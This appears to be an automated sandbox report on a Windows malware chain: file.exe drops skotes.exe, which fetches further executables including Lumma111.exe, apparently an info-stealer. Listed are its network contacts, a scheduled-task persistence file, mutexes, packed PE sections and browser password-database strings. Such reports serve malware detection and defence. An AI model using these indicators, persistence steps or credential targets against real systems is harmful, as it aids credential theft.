Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: cfc45d1c7c.exe, 0000000A.00000003.2720320103.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/O)NM
Source: cfc45d1c7c.exe, 0000000A.00000003.2720320103.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: firefox.exe, 0000001C.00000002.2836535538.000001D78E9B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928265482.000001994D290000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928265482.000001994D29A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2938789773.000001994D574000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2925762375.000001B639BCA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928043417.000001B639FD4000.00000004.00000020.00020000.00000000.sdmp, 064deba48e.exe, 00000022.00000003.2976246862.00000000008D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3009556207.000001ACFACC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3047503720.000002086BD5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3113524727.0000020877B26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3045442687.000002086BB20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001B.00000002.2820741712.000002D369807000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2836535538.000001D78E9C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3009556207.000001ACFACC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001F.00000002.2928265482.000001994D29A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd8
Source: firefox.exe, 0000001F.00000002.2928265482.000001994D290000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2938789773.000001994D574000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928043417.000001B639FD4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2925762375.000001B639BC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3053234298.000002086D9F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown HTTPS traffic detected: 104.21.85.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49936 version: TLS 1.2

System Summary

barindex
Source: 064deba48e.exe, 0000000D.00000002.2856707163.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_6cee4430-3
Source: 064deba48e.exe, 0000000D.00000002.2856707163.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_2e93fc50-e
Source: 064deba48e.exe, 00000022.00000002.3021178012.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_7268d122-7
Source: 064deba48e.exe, 00000022.00000002.3021178012.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f5d59a9d-e
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: ae87049195.exe.6.dr Static PE information: section name:
Source: ae87049195.exe.6.dr Static PE information: section name: .rsrc
Source: ae87049195.exe.6.dr Static PE information: section name: .idata
Source: ae87049195.exe.6.dr Static PE information: section name:
Source: c8a61f4196.exe.6.dr Static PE information: section name:
Source: c8a61f4196.exe.6.dr Static PE information: section name: .idata
Source: Lumma111[1].exe.6.dr Static PE information: section name:
Source: Lumma111[1].exe.6.dr Static PE information: section name: .idata
Source: Lumma111[1].exe.6.dr Static PE information: section name:
Source: Lumma111.exe.6.dr Static PE information: section name:
Source: Lumma111.exe.6.dr Static PE information: section name: .idata
Source: Lumma111.exe.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: cfc45d1c7c.exe.6.dr Static PE information: section name:
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: .idata
Source: cfc45d1c7c.exe.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name:
Source: 686764db73.exe.6.dr Static PE information: section name:
Source: 686764db73.exe.6.dr Static PE information: section name: .idata
Source: 686764db73.exe.6.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000AE530 6_2_000AE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E7049 6_2_000E7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E8860 6_2_000E8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E78BB 6_2_000E78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E2D10 6_2_000E2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E31A8 6_2_000E31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000A4DE0 6_2_000A4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000A4B30 6_2_000A4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000D7F36 6_2_000D7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E779B 6_2_000E779B
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9979883344686649
Source: file.exe Static PE information: Section: hwqxmwlo ZLIB complexity 0.9945905089009288
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9979883344686649
Source: skotes.exe.0.dr Static PE information: Section: hwqxmwlo ZLIB complexity 0.9945905089009288
Source: random[1].exe.6.dr Static PE information: Section: mouszfiw ZLIB complexity 0.9943214903303218
Source: ae87049195.exe.6.dr Static PE information: Section: mouszfiw ZLIB complexity 0.9943214903303218
Source: Lumma111[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9973764954620462
Source: Lumma111[1].exe.6.dr Static PE information: Section: ucbvvkym ZLIB complexity 0.9947109233895244
Source: Lumma111.exe.6.dr Static PE information: Section: ZLIB complexity 0.9973764954620462
Source: Lumma111.exe.6.dr Static PE information: Section: ucbvvkym ZLIB complexity 0.9947109233895244
Source: random[1].exe1.6.dr Static PE information: Section: ZLIB complexity 0.9974409550330033
Source: random[1].exe1.6.dr Static PE information: Section: akxghhwi ZLIB complexity 0.994061902397764
Source: cfc45d1c7c.exe.6.dr Static PE information: Section: ZLIB complexity 0.9974409550330033
Source: cfc45d1c7c.exe.6.dr Static PE information: Section: akxghhwi ZLIB complexity 0.994061902397764
Source: random[1].exe2.6.dr Static PE information: Section: lgjpmlrc ZLIB complexity 0.994951031259183
Source: 686764db73.exe.6.dr Static PE information: Section: lgjpmlrc ZLIB complexity 0.994951031259183
Source: Lumma111.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: Lumma111[1].exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: ae87049195.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@75/21@17/9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5240:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000010.00000002.2867116060.0000481C028BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: cfc45d1c7c.exe, 0000000A.00000003.2670036587.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2669670593.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2829134469.0000000005A68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 52%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Lumma111.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe "C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe "C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe"
